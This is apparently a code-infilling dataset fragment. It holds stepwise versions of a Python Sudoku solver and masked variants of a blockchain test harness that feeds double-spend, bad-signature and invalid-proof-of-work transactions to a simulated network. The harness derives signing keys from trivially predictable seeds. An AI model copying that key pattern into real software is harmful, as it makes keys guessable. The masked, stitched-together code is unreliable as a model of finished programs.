i)\n\n def solve(self):\n \"\"\"\n Solves the Sub grid and prints the sub grid\n Returns None\n \"\"\"\n self.perform()\n for i in range(9):\n for j in range(9):\n print(self.sub_grid[i][j], end=' ')\n print()\n\n\n<mask token>\nmat.solve()\n",
"step-3": "<mask token>\n\n\nclass Sudoku:\n\n def __init__(self, grid):\n \"\"\"\n Initializes the grid\n \"\"\"\n self.grid = grid\n self.sub_grid = self.create_sub_grid(self.grid)\n\n def create_sub_grid(self, grid):\n \"\"\" \n Creates a Sub grid, containing the possible numbers within a cell\n Returns a Sub grid\n \"\"\"\n sub_grid = []\n for i in range(9):\n sub = []\n for j in range(9):\n if grid[i][j] == 0:\n sub.append(self.missing_numbers(i, j))\n else:\n sub.append([grid[i][j]])\n sub_grid.append(sub)\n del sub\n return sub_grid\n\n def missing_numbers(self, row, column):\n \"\"\"\n Returs the possible set of numbers of a particular row and column\n \"\"\"\n rrow, ccolumn = self.row_and_column(self.grid, row, column)\n cell = self.cell_3by3(row, column)\n missing_num = list({i for i in range(1, 10)} - set(rrow + ccolumn +\n cell))\n return missing_num\n\n def cell_3by3(self, row, column):\n \"\"\"\n Returns grid of 3 X 3\n \"\"\"\n cell = []\n a = row // 3\n b = column // 3\n for i in range(9):\n for j in range(9):\n if i // 3 == a and j // 3 == b:\n cell.append(grid[i][j])\n return cell\n\n def row_and_column(self, grid, row, column):\n \"\"\"\n Returns rows and columns\n \"\"\"\n r = grid[row]\n c = []\n for j in range(9):\n c.append(grid[j][column])\n return r, c\n\n def step_1(self, sub_grid, num):\n \"\"\"\n Reducing a list of clues to a single value based on row and column elimination\n Returns a refined sub grid\n \"\"\"\n row, column = self.row_and_column(sub_grid, num, num)\n row_flatten = sum(row, [])\n single_values = [i for i, j in Counter(row_flatten).items() if j == 1]\n for i in range(len(sub_grid)):\n for j in single_values:\n if j in sub_grid[num][i] and len(sub_grid[num][i]) != 1:\n sub_grid[num][i] = [j]\n column_flatten = sum(column, [])\n column_single_values = [i for i, j in Counter(column_flatten).items\n () if j == 1]\n for i in range(len(sub_grid)):\n for j in column_single_values:\n if j in sub_grid[i][num] and len(sub_grid[i][num]) != 1:\n sub_grid[i][num] = [j]\n return sub_grid\n\n def step_2(self, sub_grid, num):\n \"\"\"\n Removes a number 'n' that fits at its correct position from other lists corresponding its row and column\n Returns refined sub grid\n \"\"\"\n row, column = self.row_and_column(sub_grid, num, num)\n single_value_list = []\n for i in range(len(row)):\n if len(sub_grid[num][i]) == 1:\n single_value_list.append(sub_grid[num][i])\n single_value_list_flatten = sum(single_value_list, [])\n for i in range(len(sub_grid)):\n if len(sub_grid[num][i]) != 1:\n for j in single_value_list_flatten:\n if j in sub_grid[num][i]:\n sub_grid[num][i].remove(j)\n single_value_list = []\n for i in range(len(column)):\n if len(sub_grid[i][num]) == 1:\n single_value_list.append(sub_grid[i][num])\n single_value_list_flatten = sum(single_value_list, [])\n for i in range(len(sub_grid)):\n if len(sub_grid[i][num]) != 1:\n for j in single_value_list_flatten:\n if j in sub_grid[i][num]:\n sub_grid[i][num].remove(j)\n return sub_grid\n\n def step_3(self, sub_grid, num):\n pass\n\n def perform(self):\n \"\"\"\n Performs the step_1 and step_2 untill the Sub grid is solved\n Returns None\n \"\"\"\n temp = []\n while self.sub_grid != temp:\n temp = deepcopy(self.sub_grid)\n for i in range(len(grid)):\n self.sub_grid = self.step_1(self.sub_grid, i)\n self.sub_grid = self.step_2(self.sub_grid, i)\n\n def solve(self):\n \"\"\"\n Solves the Sub grid and prints the sub grid\n Returns None\n \"\"\"\n self.perform()\n for i in range(9):\n for j in range(9):\n print(self.sub_grid[i][j], end=' ')\n print()\n\n\ngrid = [[8, 0, 6, 0, 0, 0, 4, 0, 9], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 9, 2,\n 0, 0, 0, 5, 0, 8], [0, 0, 9, 0, 7, 1, 3, 0, 0], [5, 0, 8, 0, 0, 0, 0, 2,\n 0], [0, 0, 4, 0, 5, 0, 0, 0, 0], [0, 0, 0, 0, 0, 7, 9, 1, 0], [0, 0, 0,\n 9, 0, 0, 0, 0, 7], [0, 7, 0, 0, 0, 3, 0, 0, 4]]\nmat = Sudoku(grid)\nmat.solve()\n",
"step-4": "from pprint import pprint\nfrom collections import Counter\nfrom copy import deepcopy\n\n\nclass Sudoku:\n\n def __init__(self, grid):\n \"\"\"\n Initializes the grid\n \"\"\"\n self.grid = grid\n self.sub_grid = self.create_sub_grid(self.grid)\n\n def create_sub_grid(self, grid):\n \"\"\" \n Creates a Sub grid, containing the possible numbers within a cell\n Returns a Sub grid\n \"\"\"\n sub_grid = []\n for i in range(9):\n sub = []\n for j in range(9):\n if grid[i][j] == 0:\n sub.append(self.missing_numbers(i, j))\n else:\n sub.append([grid[i][j]])\n sub_grid.append(sub)\n del sub\n return sub_grid\n\n def missing_numbers(self, row, column):\n \"\"\"\n Returs the possible set of numbers of a particular row and column\n \"\"\"\n rrow, ccolumn = self.row_and_column(self.grid, row, column)\n cell = self.cell_3by3(row, column)\n missing_num = list({i for i in range(1, 10)} - set(rrow + ccolumn +\n cell))\n return missing_num\n\n def cell_3by3(self, row, column):\n \"\"\"\n Returns grid of 3 X 3\n \"\"\"\n cell = []\n a = row // 3\n b = column // 3\n for i in range(9):\n for j in range(9):\n if i // 3 == a and j // 3 == b:\n cell.append(grid[i][j])\n return cell\n\n def row_and_column(self, grid, row, column):\n \"\"\"\n Returns rows and columns\n \"\"\"\n r = grid[row]\n c = []\n for j in range(9):\n c.append(grid[j][column])\n return r, c\n\n def step_1(self, sub_grid, num):\n \"\"\"\n Reducing a list of clues to a single value based on row and column elimination\n Returns a refined sub grid\n \"\"\"\n row, column = self.row_and_column(sub_grid, num, num)\n row_flatten = sum(row, [])\n single_values = [i for i, j in Counter(row_flatten).items() if j == 1]\n for i in range(len(sub_grid)):\n for j in single_values:\n if j in sub_grid[num][i] and len(sub_grid[num][i]) != 1:\n sub_grid[num][i] = [j]\n column_flatten = sum(column, [])\n column_single_values = [i for i, j in Counter(column_flatten).items\n () if j == 1]\n for i in range(len(sub_grid)):\n for j in column_single_values:\n if j in sub_grid[i][num] and len(sub_grid[i][num]) != 1:\n sub_grid[i][num] = [j]\n return sub_grid\n\n def step_2(self, sub_grid, num):\n \"\"\"\n Removes a number 'n' that fits at its correct position from other lists corresponding its row and column\n Returns refined sub grid\n \"\"\"\n row, column = self.row_and_column(sub_grid, num, num)\n single_value_list = []\n for i in range(len(row)):\n if len(sub_grid[num][i]) == 1:\n single_value_list.append(sub_grid[num][i])\n single_value_list_flatten = sum(single_value_list, [])\n for i in range(len(sub_grid)):\n if len(sub_grid[num][i]) != 1:\n for j in single_value_list_flatten:\n if j in sub_grid[num][i]:\n sub_grid[num][i].remove(j)\n single_value_list = []\n for i in range(len(column)):\n if len(sub_grid[i][num]) == 1:\n single_value_list.append(sub_grid[i][num])\n single_value_list_flatten = sum(single_value_list, [])\n for i in range(len(sub_grid)):\n if len(sub_grid[i][num]) != 1:\n for j in single_value_list_flatten:\n if j in sub_grid[i][num]:\n sub_grid[i][num].remove(j)\n return sub_grid\n\n def step_3(self, sub_grid, num):\n pass\n\n def perform(self):\n \"\"\"\n Performs the step_1 and step_2 untill the Sub grid is solved\n Returns None\n \"\"\"\n temp = []\n while self.sub_grid != temp:\n temp = deepcopy(self.sub_grid)\n for i in range(len(grid)):\n self.sub_grid = self.step_1(self.sub_grid, i)\n self.sub_grid = self.step_2(self.sub_grid, i)\n\n def solve(self):\n \"\"\"\n Solves the Sub grid and prints the sub grid\n Returns None\n \"\"\"\n self.perform()\n for i in range(9):\n for j in range(9):\n print(self.sub_grid[i][j], end=' ')\n print()\n\n\ngrid = [[8, 0, 6, 0, 0, 0, 4, 0, 9], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 9, 2,\n 0, 0, 0, 5, 0, 8], [0, 0, 9, 0, 7, 1, 3, 0, 0], [5, 0, 8, 0, 0, 0, 0, 2,\n 0], [0, 0, 4, 0, 5, 0, 0, 0, 0], [0, 0, 0, 0, 0, 7, 9, 1, 0], [0, 0, 0,\n 9, 0, 0, 0, 0, 7], [0, 7, 0, 0, 0, 3, 0, 0, 4]]\nmat = Sudoku(grid)\nmat.solve()\n",
"step-5": "\r\n\r\n\r\nfrom pprint import pprint\r\nfrom collections import Counter\r\nfrom copy import deepcopy\r\n\r\n\r\nclass Sudoku():\r\n def __init__(self, grid):\r\n '''\r\n Initializes the grid\r\n '''\r\n self.grid = grid\r\n self.sub_grid = self.create_sub_grid(self.grid)\r\n\r\n def create_sub_grid(self, grid):\r\n ''' \r\n Creates a Sub grid, containing the possible numbers within a cell\r\n Returns a Sub grid\r\n '''\r\n sub_grid = []\r\n for i in range(9):\r\n sub = []\r\n for j in range(9):\r\n if grid[i][j] == 0:\r\n sub.append(self.missing_numbers(i,j))\r\n else:\r\n sub.append([grid[i][j]])\r\n sub_grid.append(sub)\r\n del sub\r\n return sub_grid\r\n\r\n\r\n def missing_numbers(self, row, column):\r\n '''\r\n Returs the possible set of numbers of a particular row and column\r\n '''\r\n\r\n rrow, ccolumn = self.row_and_column(self.grid, row, column)\r\n cell = self.cell_3by3(row, column)\r\n \r\n missing_num = list({i for i in range(1, 10)} - set(rrow + ccolumn + cell))\r\n return missing_num\r\n\r\n\r\n\r\n def cell_3by3(self, row, column):\r\n '''\r\n Returns grid of 3 X 3\r\n '''\r\n\r\n cell = []\r\n a = row // 3\r\n b = column // 3\r\n for i in range(9):\r\n for j in range(9):\r\n if i // 3 == a and j // 3 == b : \r\n cell.append(grid[i][j])\r\n return cell\r\n\r\n def row_and_column(self, grid, row, column): \r\n '''\r\n Returns rows and columns\r\n '''\r\n r = grid[row]\r\n c = []\r\n for j in range(9):\r\n c.append(grid[j][column])\r\n return r, c\r\n\r\n\r\n\r\n\r\n def step_1(self, sub_grid, num):\r\n '''\r\n Reducing a list of clues to a single value based on row and column elimination\r\n Returns a refined sub grid\r\n '''\r\n\r\n\r\n row,column = self.row_and_column(sub_grid,num,num)\r\n\r\n row_flatten = sum(row,[])\r\n single_values = [i for i,j in Counter(row_flatten).items() if j == 1 ]\r\n\r\n # For Rows\r\n for i in range(len(sub_grid)):\r\n for j in single_values:\r\n if j in sub_grid[num][i] and len(sub_grid[num][i]) != 1:\r\n sub_grid[num][i] = [j] \r\n\r\n # For Columns\r\n column_flatten = sum(column, [])\r\n column_single_values = [i for i,j in Counter(column_flatten).items() if j == 1 ]\r\n for i in range(len(sub_grid)):\r\n for j in column_single_values:\r\n if j in sub_grid[i][num] and len(sub_grid[i][num]) != 1:\r\n sub_grid[i][num] = [j]\r\n\r\n\r\n\r\n return sub_grid\r\n\r\n def step_2(self, sub_grid, num):\r\n '''\r\n Removes a number 'n' that fits at its correct position from other lists corresponding its row and column\r\n Returns refined sub grid\r\n '''\r\n\r\n row,column = self.row_and_column(sub_grid,num,num)\r\n\r\n # For Rows\r\n single_value_list = []\r\n for i in range(len(row)):\r\n if len(sub_grid[num][i]) == 1:\r\n single_value_list.append(sub_grid[num][i])\r\n single_value_list_flatten = sum(single_value_list, [])\r\n\r\n for i in range(len(sub_grid)):\r\n if len(sub_grid[num][i]) != 1: \r\n for j in single_value_list_flatten:\r\n if j in sub_grid[num][i]:\r\n sub_grid[num][i].remove(j)\r\n\r\n # For Columns\r\n single_value_list = []\r\n for i in range(len(column)):\r\n if len(sub_grid[i][num]) == 1:\r\n single_value_list.append(sub_grid[i][num])\r\n single_value_list_flatten = sum(single_value_list, [])\r\n\r\n for i in range(len(sub_grid)):\r\n if len(sub_grid[i][num]) != 1: \r\n for j in single_value_list_flatten:\r\n if j in sub_grid[i][num]:\r\n sub_grid[i][num].remove(j)\r\n\r\n return sub_grid\r\n\r\n def step_3(self, sub_grid, num):\r\n pass\r\n\r\n \r\n\r\n\r\n def perform(self):\r\n '''\r\n Performs the step_1 and step_2 untill the Sub grid is solved\r\n Returns None\r\n '''\r\n\r\n temp = []\r\n while self.sub_grid != temp: \r\n temp = deepcopy(self.sub_grid) \r\n for i in range(len(grid)):\r\n self.sub_grid = self.step_1(self.sub_grid, i)\r\n self.sub_grid = self.step_2(self.sub_grid, i)\r\n\r\n\r\n def solve(self):\r\n '''\r\n Solves the Sub grid and prints the sub grid\r\n Returns None\r\n '''\r\n\r\n self.perform()\r\n for i in range(9):\r\n for j in range(9):\r\n print(self.sub_grid[i][j], end=' ')\r\n print()\r\n\r\n\r\n# grid = [\r\n# [0,3,0,0,1,0,0,6,0],\r\n# [7,5,0,0,3,0,0,4,8],\r\n# [0,0,6,9,8,4,3,0,0],\r\n# [0,0,3,0,0,0,8,0,0],\r\n# [9,1,2,0,0,0,6,7,4],\r\n# [0,0,4,0,0,0,5,0,0],\r\n# [0,0,1,6,7,5,2,0,0],\r\n# [6,8,0,0,9,0,0,1,5],\r\n# [0,9,0,0,4,0,0,3,0]\r\n# ]\r\n\r\n# grid = [\r\n# [6,0,0,1,0,8,2,0,3],\r\n# [0,2,0,0,4,0,0,9,0],\r\n# [8,0,3,0,0,5,4,0,0],\r\n# [5,0,4,6,0,7,0,0,9],\r\n# [0,3,0,0,0,0,0,5,0],\r\n# [7,0,0,8,0,3,1,0,2],\r\n# [0,0,1,7,0,0,9,0,6],\r\n# [0,8,0,0,3,0,0,2,0],\r\n# [3,0,2,9,0,4,0,0,5]\r\n# ]\r\ngrid = [\r\n [8,0,6,0,0,0,4,0,9],\r\n [0,0,0,0,0,0,0,0,0],\r\n [0,9,2,0,0,0,5,0,8],\r\n [0,0,9,0,7,1,3,0,0],\r\n [5,0,8,0,0,0,0,2,0],\r\n [0,0,4,0,5,0,0,0,0],\r\n [0,0,0,0,0,7,9,1,0],\r\n [0,0,0,9,0,0,0,0,7],\r\n [0,7,0,0,0,3,0,0,4],\r\n]\r\n\r\nmat = Sudoku(grid)\r\nmat.solve()\r\n",
"step-ids": [
10,
12,
13,
14,
15
]
}
|
[
10,
12,
13,
14,
15
] |
<|reserved_special_token_0|>
class MVBTest:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def doubleSpendTest(self):
"""
txOutputs is the genesis output.
txOutputs[0] was used twice in this test.
Both Tx1 and Tx2 make txOutputs[0] as input.
When Tx2 is mined, the verification will be failed.
"""
log.info(
'--------------------Double spend test now started-------------------'
)
log.info(
'A pair of valid and invalid transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/DoubleSpendTestTx.json')
self.mvb.broadcastTxPools()
def inputOutputSumTest(self):
log.info(
'--------------------Input output sum test now started-------------------'
)
log.info(
'A pair of valid and invalid Transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/InputOutputSumTestTx.json')
self.mvb.broadcastTxPools()
def sigVerifyTest(self):
log.info(
'--------------------Signature verify test now started-------------------'
)
log.info(
'A pair of valid and invalid Transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/SigVerifyTestTx.json')
self.mvb.broadcastTxPools()
def numberHashTest(self):
log.info(
'--------------------Number hash test now started-------------------'
)
log.info(
'A pair of valid and invalid Transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/NumberHashTestTx.json')
self.mvb.broadcastTxPools()
def txInputsExistTest(self):
log.info(
'--------------------Transaction inputs exist test now started-------------------'
)
log.info(
'A pair of valid and invalid Transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/TxInputsExistTestTx.json')
self.mvb.broadcastTxPools()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def threadMining(self, node: Node, i):
nowTime = time.time()
while True:
sleep(random.uniform(0.05, 0.1))
node.receiveBroadcastBlock()
for tx in node.globalTxPool:
node.mineBlock(tx)
if node.globalTxPool:
node.globalTxPool.remove(tx)
if time.time() - nowTime > 15:
break
node.saveToFile()
def createTxJsonFile(self, FILENAME: str, txList: List[Transaction]):
txListJsonObj = {'txList': []}
for tx in txList:
txListJsonObj['txList'].append(tx.getJsonObj())
with open(FILENAME, 'w', encoding='utf-8') as f:
f.write(json.dumps(txListJsonObj, indent=4))
def readTxFromFile(self, FILENAME: str) ->List[Transaction]:
txList = []
with open(FILENAME, 'r', encoding='utf-8') as f:
txListJsonObj = json.load(f)
for txObj in txListJsonObj['txList']:
newTx = Transaction(jsonObj=txObj)
txList.append(newTx)
return txList
def __initialSigningKeys(self) ->None:
"""
Generate and update signingKeys List for the network
"""
seedStr = '0' * 31
seedNum = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b',
'c', 'd', 'e', 'f']
seedList = []
for i in range(15):
seed = seedStr + seedNum[i]
seedList.append(seed.encode('utf-8'))
for seed in seedList:
self.signingKeysList.append(SigningKey(seed))
log.info('15 signing keys have been generated successfully')
def __initialPubKeys(self):
for signingKey in self.signingKeysList:
verifyKey = signingKey.verify_key
verifyKeyByte = verifyKey.encode(encoder=HexEncoder)
self.pubKeysList.append(verifyKey)
self.pubKeysByteList.append(verifyKeyByte)
log.info(str(len(self.pubKeysList)) +
' public keys have been generated successfully')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MVBTest:
def __init__(self, initialNodeCnt):
self.mvb = MVB()
self.signingKeysList = []
self.pubKeysList = []
self.pubKeysByteList = []
self.__initialSigningKeys()
self.__initialPubKeys()
self.mvb.generateGenesisBlockFromJson()
self.mvb.initialNodes(initialNodeCnt)
for i, node in enumerate(self.mvb.networkNodes):
nodeThread = Thread(target=self.threadMining, args=(node, 1))
nodeThread.start()
def multipleValidTxTest(self):
"""
This method tests multiple valid transactions
"""
log.info(
'--------------------Multiple valid Tx tests now started-------------------'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/MultipleValidTestTx.json')
self.mvb.broadcastTxPools()
def doubleSpendTest(self):
"""
txOutputs is the genesis output.
txOutputs[0] was used twice in this test.
Both Tx1 and Tx2 make txOutputs[0] as input.
When Tx2 is mined, the verification will be failed.
"""
log.info(
'--------------------Double spend test now started-------------------'
)
log.info(
'A pair of valid and invalid transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/DoubleSpendTestTx.json')
self.mvb.broadcastTxPools()
def inputOutputSumTest(self):
log.info(
'--------------------Input output sum test now started-------------------'
)
log.info(
'A pair of valid and invalid Transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/InputOutputSumTestTx.json')
self.mvb.broadcastTxPools()
def sigVerifyTest(self):
log.info(
'--------------------Signature verify test now started-------------------'
)
log.info(
'A pair of valid and invalid Transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/SigVerifyTestTx.json')
self.mvb.broadcastTxPools()
def numberHashTest(self):
log.info(
'--------------------Number hash test now started-------------------'
)
log.info(
'A pair of valid and invalid Transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/NumberHashTestTx.json')
self.mvb.broadcastTxPools()
def txInputsExistTest(self):
log.info(
'--------------------Transaction inputs exist test now started-------------------'
)
log.info(
'A pair of valid and invalid Transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/TxInputsExistTestTx.json')
self.mvb.broadcastTxPools()
def prevHashMatchTest(self):
log.info(
'--------------------Prev Hash test now started-------------------'
)
log.info(
'Node 2 broadcast a Block with invalid prev-hash to the other nodes'
)
txList = self.readTxFromFile('./TxFiles/PrevHashMatchTestTx.json')
self.mvb.networkNodes[1].mineInvalidBlock(txList[0],
isInvalidPrevHash=True)
def blockPOWTest(self):
log.info(
'--------------------Block POW test now started-------------------'
)
log.info('Node 1 broadcast a Block with invalid POW to the other nodes'
)
txList = self.readTxFromFile('./TxFiles/BlockPOWTestTx.json')
self.mvb.networkNodes[0].mineInvalidBlock(txList[0], isInvalidPOW=True)
def threadMining(self, node: Node, i):
nowTime = time.time()
while True:
sleep(random.uniform(0.05, 0.1))
node.receiveBroadcastBlock()
for tx in node.globalTxPool:
node.mineBlock(tx)
if node.globalTxPool:
node.globalTxPool.remove(tx)
if time.time() - nowTime > 15:
break
node.saveToFile()
def createTxJsonFile(self, FILENAME: str, txList: List[Transaction]):
txListJsonObj = {'txList': []}
for tx in txList:
txListJsonObj['txList'].append(tx.getJsonObj())
with open(FILENAME, 'w', encoding='utf-8') as f:
f.write(json.dumps(txListJsonObj, indent=4))
def readTxFromFile(self, FILENAME: str) ->List[Transaction]:
txList = []
with open(FILENAME, 'r', encoding='utf-8') as f:
txListJsonObj = json.load(f)
for txObj in txListJsonObj['txList']:
newTx = Transaction(jsonObj=txObj)
txList.append(newTx)
return txList
def __initialSigningKeys(self) ->None:
"""
Generate and update signingKeys List for the network
"""
seedStr = '0' * 31
seedNum = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b',
'c', 'd', 'e', 'f']
seedList = []
for i in range(15):
seed = seedStr + seedNum[i]
seedList.append(seed.encode('utf-8'))
for seed in seedList:
self.signingKeysList.append(SigningKey(seed))
log.info('15 signing keys have been generated successfully')
def __initialPubKeys(self):
for signingKey in self.signingKeysList:
verifyKey = signingKey.verify_key
verifyKeyByte = verifyKey.encode(encoder=HexEncoder)
self.pubKeysList.append(verifyKey)
self.pubKeysByteList.append(verifyKeyByte)
log.info(str(len(self.pubKeysList)) +
' public keys have been generated successfully')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
coloredlogs.install()
logging.basicConfig(level=logging.INFO, format=
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
log = logging.getLogger(__name__)
class MVBTest:
def __init__(self, initialNodeCnt):
self.mvb = MVB()
self.signingKeysList = []
self.pubKeysList = []
self.pubKeysByteList = []
self.__initialSigningKeys()
self.__initialPubKeys()
self.mvb.generateGenesisBlockFromJson()
self.mvb.initialNodes(initialNodeCnt)
for i, node in enumerate(self.mvb.networkNodes):
nodeThread = Thread(target=self.threadMining, args=(node, 1))
nodeThread.start()
def multipleValidTxTest(self):
"""
This method tests multiple valid transactions
"""
log.info(
'--------------------Multiple valid Tx tests now started-------------------'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/MultipleValidTestTx.json')
self.mvb.broadcastTxPools()
def doubleSpendTest(self):
"""
txOutputs is the genesis output.
txOutputs[0] was used twice in this test.
Both Tx1 and Tx2 make txOutputs[0] as input.
When Tx2 is mined, the verification will be failed.
"""
log.info(
'--------------------Double spend test now started-------------------'
)
log.info(
'A pair of valid and invalid transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/DoubleSpendTestTx.json')
self.mvb.broadcastTxPools()
def inputOutputSumTest(self):
log.info(
'--------------------Input output sum test now started-------------------'
)
log.info(
'A pair of valid and invalid Transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/InputOutputSumTestTx.json')
self.mvb.broadcastTxPools()
def sigVerifyTest(self):
log.info(
'--------------------Signature verify test now started-------------------'
)
log.info(
'A pair of valid and invalid Transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/SigVerifyTestTx.json')
self.mvb.broadcastTxPools()
def numberHashTest(self):
log.info(
'--------------------Number hash test now started-------------------'
)
log.info(
'A pair of valid and invalid Transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/NumberHashTestTx.json')
self.mvb.broadcastTxPools()
def txInputsExistTest(self):
log.info(
'--------------------Transaction inputs exist test now started-------------------'
)
log.info(
'A pair of valid and invalid Transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/TxInputsExistTestTx.json')
self.mvb.broadcastTxPools()
def prevHashMatchTest(self):
log.info(
'--------------------Prev Hash test now started-------------------'
)
log.info(
'Node 2 broadcast a Block with invalid prev-hash to the other nodes'
)
txList = self.readTxFromFile('./TxFiles/PrevHashMatchTestTx.json')
self.mvb.networkNodes[1].mineInvalidBlock(txList[0],
isInvalidPrevHash=True)
def blockPOWTest(self):
log.info(
'--------------------Block POW test now started-------------------'
)
log.info('Node 1 broadcast a Block with invalid POW to the other nodes'
)
txList = self.readTxFromFile('./TxFiles/BlockPOWTestTx.json')
self.mvb.networkNodes[0].mineInvalidBlock(txList[0], isInvalidPOW=True)
def threadMining(self, node: Node, i):
nowTime = time.time()
while True:
sleep(random.uniform(0.05, 0.1))
node.receiveBroadcastBlock()
for tx in node.globalTxPool:
node.mineBlock(tx)
if node.globalTxPool:
node.globalTxPool.remove(tx)
if time.time() - nowTime > 15:
break
node.saveToFile()
def createTxJsonFile(self, FILENAME: str, txList: List[Transaction]):
txListJsonObj = {'txList': []}
for tx in txList:
txListJsonObj['txList'].append(tx.getJsonObj())
with open(FILENAME, 'w', encoding='utf-8') as f:
f.write(json.dumps(txListJsonObj, indent=4))
def readTxFromFile(self, FILENAME: str) ->List[Transaction]:
txList = []
with open(FILENAME, 'r', encoding='utf-8') as f:
txListJsonObj = json.load(f)
for txObj in txListJsonObj['txList']:
newTx = Transaction(jsonObj=txObj)
txList.append(newTx)
return txList
def __initialSigningKeys(self) ->None:
"""
Generate and update signingKeys List for the network
"""
seedStr = '0' * 31
seedNum = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b',
'c', 'd', 'e', 'f']
seedList = []
for i in range(15):
seed = seedStr + seedNum[i]
seedList.append(seed.encode('utf-8'))
for seed in seedList:
self.signingKeysList.append(SigningKey(seed))
log.info('15 signing keys have been generated successfully')
def __initialPubKeys(self):
for signingKey in self.signingKeysList:
verifyKey = signingKey.verify_key
verifyKeyByte = verifyKey.encode(encoder=HexEncoder)
self.pubKeysList.append(verifyKey)
self.pubKeysByteList.append(verifyKeyByte)
log.info(str(len(self.pubKeysList)) +
' public keys have been generated successfully')
<|reserved_special_token_1|>
import time
import random
from BlockchainNetwork.MVB import *
from threading import Thread
coloredlogs.install()
logging.basicConfig(level=logging.INFO, format=
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
log = logging.getLogger(__name__)
class MVBTest:
def __init__(self, initialNodeCnt):
self.mvb = MVB()
self.signingKeysList = []
self.pubKeysList = []
self.pubKeysByteList = []
self.__initialSigningKeys()
self.__initialPubKeys()
self.mvb.generateGenesisBlockFromJson()
self.mvb.initialNodes(initialNodeCnt)
for i, node in enumerate(self.mvb.networkNodes):
nodeThread = Thread(target=self.threadMining, args=(node, 1))
nodeThread.start()
def multipleValidTxTest(self):
"""
This method tests multiple valid transactions
"""
log.info(
'--------------------Multiple valid Tx tests now started-------------------'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/MultipleValidTestTx.json')
self.mvb.broadcastTxPools()
def doubleSpendTest(self):
"""
txOutputs is the genesis output.
txOutputs[0] was used twice in this test.
Both Tx1 and Tx2 make txOutputs[0] as input.
When Tx2 is mined, the verification will be failed.
"""
log.info(
'--------------------Double spend test now started-------------------'
)
log.info(
'A pair of valid and invalid transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/DoubleSpendTestTx.json')
self.mvb.broadcastTxPools()
def inputOutputSumTest(self):
log.info(
'--------------------Input output sum test now started-------------------'
)
log.info(
'A pair of valid and invalid Transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/InputOutputSumTestTx.json')
self.mvb.broadcastTxPools()
def sigVerifyTest(self):
log.info(
'--------------------Signature verify test now started-------------------'
)
log.info(
'A pair of valid and invalid Transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/SigVerifyTestTx.json')
self.mvb.broadcastTxPools()
def numberHashTest(self):
log.info(
'--------------------Number hash test now started-------------------'
)
log.info(
'A pair of valid and invalid Transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/NumberHashTestTx.json')
self.mvb.broadcastTxPools()
def txInputsExistTest(self):
log.info(
'--------------------Transaction inputs exist test now started-------------------'
)
log.info(
'A pair of valid and invalid Transactions is added into GlobalTx Pool'
)
self.mvb.txWaitingPool += self.readTxFromFile(
'./TxFiles/TxInputsExistTestTx.json')
self.mvb.broadcastTxPools()
def prevHashMatchTest(self):
log.info(
'--------------------Prev Hash test now started-------------------'
)
log.info(
'Node 2 broadcast a Block with invalid prev-hash to the other nodes'
)
txList = self.readTxFromFile('./TxFiles/PrevHashMatchTestTx.json')
self.mvb.networkNodes[1].mineInvalidBlock(txList[0],
isInvalidPrevHash=True)
def blockPOWTest(self):
log.info(
'--------------------Block POW test now started-------------------'
)
log.info('Node 1 broadcast a Block with invalid POW to the other nodes'
)
txList = self.readTxFromFile('./TxFiles/BlockPOWTestTx.json')
self.mvb.networkNodes[0].mineInvalidBlock(txList[0], isInvalidPOW=True)
def threadMining(self, node: Node, i):
nowTime = time.time()
while True:
sleep(random.uniform(0.05, 0.1))
node.receiveBroadcastBlock()
for tx in node.globalTxPool:
node.mineBlock(tx)
if node.globalTxPool:
node.globalTxPool.remove(tx)
if time.time() - nowTime > 15:
break
node.saveToFile()
def createTxJsonFile(self, FILENAME: str, txList: List[Transaction]):
txListJsonObj = {'txList': []}
for tx in txList:
txListJsonObj['txList'].append(tx.getJsonObj())
with open(FILENAME, 'w', encoding='utf-8') as f:
f.write(json.dumps(txListJsonObj, indent=4))
def readTxFromFile(self, FILENAME: str) ->List[Transaction]:
txList = []
with open(FILENAME, 'r', encoding='utf-8') as f:
txListJsonObj = json.load(f)
